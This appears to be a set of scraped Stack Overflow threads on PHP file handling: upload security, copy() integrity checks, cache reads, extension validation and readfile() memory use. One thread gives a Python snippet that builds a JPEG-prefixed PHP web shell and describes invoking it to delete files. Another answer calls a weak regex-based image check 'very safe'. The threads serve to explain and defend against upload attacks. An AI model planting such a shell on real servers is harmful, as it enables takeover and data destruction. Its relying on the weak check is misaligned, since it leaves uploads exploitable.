I have the following PHP code
// Check if the upload is setted
if
(
isset($_FILES['file']['name']) && !empty($_FILES['file']['name']) &&
isset($_FILES['file']['type']) && !empty($_FILES['file']['type']) &&
isset($_FILES['file']['size']) && !empty($_FILES['file']['size'])
)
{
$UploadIsSetted = true;
$UploadIsBad = false;
$UploadExtension = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
// Check if the upload is good
require "../xdata/php/website_config/website.php";
$RandomFoo = rand(1000999999,9999999999);
if (($_FILES["file"]["size"] < ($MaxAvatarPictureSize*1000000)))
{
if ($_FILES["file"]["error"] > 0)
{
$UploadIsBad = true;
$hrefs->item(0)->setAttribute("Error","true");
$hrefs->item(0)->setAttribute("SomethingWrong","true");
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],"../upload/tmp/".$RandomFoo.".file");
}
}
else
{
// The file is too big
$UploadIsBad = true;
$hrefs->item(0)->setAttribute("Error","true");
$hrefs->item(0)->setAttribute("UploadTooBig","true");
}
}
else
{
$UploadIsSetted = false;
}
$ZipFile = new ZipArchive;
$ZipFile->open('../upload/tmp/'.$LastFilename.'.zip',ZIPARCHIVE::CREATE);
$ZipFile->addFile('../upload/tmp/'.$RandomFoo.'.file',$RandomFoo.".".$UploadExtension);
$ZipFile->close();
now my big concern is that user can upload anything so how can i prevent :
uploading 2GB 3GB files
floading
uploading some kind of twisted exploit that would eventually alter my server security
buffer overflow
filenames that have arbitrary code injections
i mean, how secure is this script?
i'm running windows for now, i will switch to linux
Four your other questions:
floading
That's the complex part. Let me google you some ideas:
Prevent PHP script from being flooded
Quick and easy flood protection? - use a nonce, time+tie it onto a session
Use a captcha, if it doesn't impair usability too much.
uploading some kind of twisted exploit that would eventually alter my server
security
Use a commandline virus scanner (f-prot or clamav) to scan uploaded files. You might use a naive regex scanner in PHP itself (probe for HTMLish content in image files, e.g.), but that's not a factual security feature; don't reinvent the wheel.
buffer overflow
PHP in general is not susceptible to buffer overflows.
Okay, joking. But you can't do anything in userland about it. But pushing strings around isn't much of a problem. That's pretty reliable and unexploitable in scripting languages, as long as you know how to escape what in which context.
filenames that have arbitrary code injections
At the very leat you should most always use basename() to avoid path traversal exploits. If you want to keep user-specified filenames, a regex whitelist is in order. =preg_replace('/[^\w\s.]/', '', $fn) as crude example.
Your line if (($_FILES["file"]["size"] < ($MaxAvatarPictureSize*1000000))) already limits the size of file acceptable to $MaxAvatarPictureSize megabytes. Though $MaxAvatarPictureSize doesn't appear to be set in the code you provided. My guess that should be 1 or 2 max.
Also not set is $LastFilename and probably some others too.
Also place an if($UploadIsBad === false) { /* do zipping */ } around the Zipping part to avoid zipping up files which are too large or otherwise invalid.
Related
I have an app that ingests photos from SD cards. After they are copied the cards will be reformatted and put back in cameras and more photos will be stored on them.
Currently, instead of using the PHP copy() function, I am doing the following (roughly):
$card = '/Volumes/SD_Card/DCIM/EOS/';
$files = scandir($card);
$target = '/Volumes/HARD_DRIVE/photos/';
foreach($files as $k => $file) {
if( strtolower ( pathinfo($file,PATHINFO_EXTENSION) ) == 'jpg') {
$img_data = file_get_contents($file);
$orig_md5 = md5($img_data);
$success = file_put_contents($target . $file, $img_data);
unset ($img_data);
if( $success != TRUE ) {
echo "an error occurred copying $file\n"; exit;
} elseif ( $orig_md5 != md5_file($target . $file) ) {
echo "an error occurred confirming data of $file\n"; exit;
} else {
echo "$file copied successfully.\n";
unlink ($img_data);
}
}
}
I am currently doing it this way so I can compare the md5 hashes to make sure the copy is a bit-for-bit match of the original.
My questions are:
1) Would using php copy() be faster? I assume it would, because the target file doesn't have to be read into memory to check the md5 hash.
2) Does copy() do some sort of hash check as part of the function, to ensure the integrity of the copy, before returning TRUE/FALSE?
PHP's copy function would not only be faster, but does it using buffers to avoid reading all the previous file in memory, which is a problem for big files. The return boolean is only for success writing, you can rely on that, but if you want to check the hash use md5_file instead of passing the content into md5, because it is optimized in the same memory-optimized way.
However if you have just to rename the file then rename is far better, it is totally instant and reliable.
No, copy() doesn't perform any additional integrity checks, it assumes that the operating system's filesystem API is reliable.
You could use md5_file() on both the source and destination:
if (copy($source, $dest) && md5_file($dest) == md5_file($source)) {
echo "File copied successfully";
} else {
echo "Copy failed";
}
Note that your integrity che
cks do not actually check the the file was written to disk properly. Most operating systems use a unified buffer cache, so when you call md5_file() immediately after writing the file, it will get the file contents from the kernel buffers, not the disk. In fact, it's possible that the target file hasn't even been written to disk yet, it's still sitting in kernel buffers that are waiting to be flushed. PHP doesn't have a function to call sync(2), but even if it did, it would still read from the buffer cache rather than re-reading from disk.
So you're basically at the mercy of the OS and hardware, which you must assume is reliable. Applications that need more reliability tests must perform direct device I/O rather than going through the filesystem.
im currently using that codes in my software, is it safe to check files extensions or are there any way to bypass it?
$ext = explode('.',$_FILES['file']['name']);
$extension = end($ext);
if($extension == 'jpg' || $extension == 'png' || $extension == 'JPG' || $extension == 'jpeg' || $extension == 'gif' || $extension == 'pjpeg' || $extension == 'x-png'){
$extension = $extension;
}
else {
echo 1;
die();
}
Thank you..
are there any way to bypass it?
One way to bypass it, is to simply rename the file..
After all, you currently just check for file name parts.
To handle image uploads securely, OWASP suggests using a re-write approach.
In PHP you could do so by loading the image with gd or imagick and saving a new image based on the input. It may sound like a relatively useless step, but it's a pretty safe way to be sure you're actually dealing with an image.
Edit: See also this answer.
I personally would not recommend just checking file extensions alone. Couple points you need to consider based on your current approach:
Imagine, if I upload a file called mypicture.jpg.php would your current if statement logic catch that out? Might be worth a test?
Following (1) if answer was no, then next question would be does your application check if any php code is contained inside the jpg image which could lead to various privilege escalations on the webserver?
Thus, following the previous answer from Stratadox I would also read this OWASP Unrestricted File Upload page. The OWASP link kindly provided by Stratadox focuses more on prevention techniques and the link I provided is more the attacking side. I think combined together this should help.
In summary, you could keep the current file extension checks but maybe expand few more advanced checks inside the if statement. Good suggestion already mentioned above is native PHP image checking functions/libraries e.g. gd or imagick.
NOTE - always research any native PHP image checking functions/libraries for security flaws (Google will help) and ensure you are configuring functions/settings correctly. This is a good practice to get into to make you a more security minded developer (and make some big $) :)
Hope this helps.
The best way is that:
<?php //A function to return the extension if you'll want use IT
function EXTENSION($sr){
$path_parts = pathinfo($sr);
$exte='.'.$path_parts['extension'];
return $exte;
;}
;?>
<?php
//OR Other way
// then test if is a Pic
list($width, $height, $type, $attr) = getimagesize($_FILES["file"]['tmp_name']);
if(preg_match("#.jpg|.jpeg|.png|.gif#i", $_FILES['file']['name']) AND $width > 2 ){
//Do what you want
;}else{
echo 1;
die();
;}
;?>
it very safe like this Bro.
In my cache system, I want it where if a new page is requested, a check is made to see if a file exists and if it doesn't then a copy is stored on the server, If it does exist, then it must not be overwritten.
The problem I have is that I may be using functions designed to be slow.
This is part of my current implementation to save files:
if (!file_exists($filename)){$h=fopen($filename,"wb");if ($h){fwrite($h,$c);fclose($h);}}
This is part of my implementation to load files:
if (($m=#filemtime($file)) !== false){
if ($m >= filemtime("sitemodification.file")){
$outp=file_get_contents($file);
header("Content-length:".strlen($outp),true);echo $outp;flush();exit();
}
}
What I want to do is replace this with a better set of functions meant for performance and yet still achieve the same functionality. All caching files including sitemodification.file reside on a ramdisk. I added a flush before exit in hopes that content will be outputted faster.
I can't use direct memory addressing at this time because the file sizes to be stored are all different.
Is there a set of functions I can use that can execute the code I provided faster by at least a few milliseconds, especially the loading files code?
I'm trying to keep my time to first byte low.
First, prefer is_file to file_exists and use file_put_contents:
if ( !is_file($filename) ) {
file_put_contents($filename,$c);
}
Then, use the proper function for this kind of work, readfile:
if ( ($m = #filemtime($file)) !== false && $m >= filemtime('sitemodification.file')) {
header('Content-length:'.filesize($file));
readfile($file);
}
}
You should see a little improvement but keep in mind that file accesses are slow and you check three times for files access before sending any content.
I read that exif_imagetype is secure function to avoid uploading php or other shell code instead of image file. Recently i read another article that we can bypass this secure function by some simple methods. So if someone knows the exact method to bypass can u share your answers.
I used following code in my php script so i wanted to know this is vulnerable or not and remedy for the same
if (! exif_imagetype($_FILES['upload']['tmp_name']))
{
echo "File is not an image";
}
Based on Mr. #jake_the_snake's answer, I would also include a quick code sample in Python
>>> fh = open('shell.php', 'w')
>>> fh.write('\xFF\xD8\xFF\xE0' + '<? passthru($_GET["cmd"]); ?>')
>>> fh.close()
It's a bit more complicated that just running exif_imagetype. That function simply checks the magic number at the beginning of the file, so more checks are needed. Without more knowledge of your software, it's hard to make a judgement, but consider this example:
I construct "shell.php" with the JPEG magic number 0xFFD8FFE0 followed by the string <? passthru($_GET["cmd"]); ?>.
I upload it to your server. The magic number bypasses exif_imagetype. The file is uploaded to www.your-domain.com/uploads/shell.php. I then navigate to www.your-domain.com/uploads/shell.php?rm -r *. The server finds the starting <? and starts interpreting PHP. Yay! I've deleted all your uploads assuming you're running on a Linux webserver.
Even doing a deeper check on the validity of the image won't help, because I could include my malicious script in the metadata of the image. This is only prevented by using a whitelist of file extensions.
[TL;DR] It's not secure without more checking. You need to ensure an appropriate file name, use a whitelist of file extensions, limit file size, and perform standard security measures.
#solidak 's answer works for python2 since it is deprecated now, here is a Python3 rewrite:
>>> fh = open('shell.php', 'wb')
>>> fh.write(b'\xFF\xD8\xFF\xE0' + b'<? passthru($_GET["cmd"]); ?>')
>>> fh.close()
For security i use
$extension = pathinfo($_FILES['upload']['name'], PATHINFO_EXTENSION);
if(!in_array(strtolower($extension), array('jpg', 'jpeg', 'png', 'gif')))
{
echo "File is not an image";
}
I've seen many questions about how to efficiently use PHP to download files rather than allowing direct HTTP requests (to keep files secure, to track downloads, etc.).
The answer is almost always PHP readfile().
Downloading large files reliably in PHP
How to force download of big files without using too much memory?
Best way to transparently log downloads?
BUT, although it works great during testing with huge files, when it's on a live site with hundreds of users, downloads start to hang and PHP memory limits are exhausted.
So what is it about how readfile() works that causes memory to blow up so bad when traffic is high? I thought it's supposed to bypass heavy use of PHP memory by writing directly to the output buffer?
EDIT: (To clarify, I'm looking for a "why", not "what can I do". I think that Apache's mod_xsendfile is the best way to circumvent)
Description
int readfile ( string $filename [, bool $use_include_path = false [, resource $context ]] )
Reads a file and writes it to the output buffer*.
PHP has to read the file and it writes to the output buffer.
So, for 300Mb file, no matter what the implementation you wrote (by many small segments, or by 1 big chunk) PHP has to read through 300Mb of file eventually.
If multiple user has to download the file, there will be a problem.
(In one server, hosting providers will limit memory given to each hosting user. With such limited memory, using buffer is not going to be a good idea. )
I think using the direct link to download a file is a much better approach for big files.
If you have output buffering on than use ob_end_flush() right before the call to readfile()
header(...);
ob_end_flush();
#readfile($file);
As mentioned here: "Allowed memory .. exhausted" when using readfile, the following block of code at the top of the php file did the trick for me.
This will checks if php output buffering is active. If so it turns it off.
if (ob_get_level()) {
ob_end_clean();
}
You might want to turn off output buffering altogether for that particular location, using PHP's output_buffering configuration directive.
Apache example:
<Directory "/your/downloadable/files">
...
php_admin_value output_buffering "0"
...
</Directory>
"Off" as the value seems to work as well, while it really should throw an error. At least according to how other types are converted to booleans in PHP. *shrugs*
Came up with this idea in the past (as part of my library) to avoid high memory usage:
function suTunnelStream( $sUrl, $sMimeType, $sCharType = null )
{
$f = #fopen( $sUrl, 'rb' );
if( $f === false )
{ return false; }
$b = false;
$u = true;
while( $u !== false && !feof($f ))
{
$u = #fread( $f, 1024 );
if( $u !== false )
{
if( !$b )
{ $b = true;
suClearOutputBuffers();
suCachedHeader( 0, $sMimeType, $sCharType, null, !suIsValidString($sCharType)?('content-disposition: attachment; filename="'.suUniqueId($sUrl).'"'):null );
}
echo $u;
}
}
#fclose( $f );
return ( $b && $u !== false );
}
Maybe this can give you some inspiration.
Well, it is memory intensive function. I would pipe users to a static server that has specific rule set in place to control downloads instead of using readfile().
If that's not an option add more RAM to satisfy the load or introduce queuing system that gracefully controls server usage.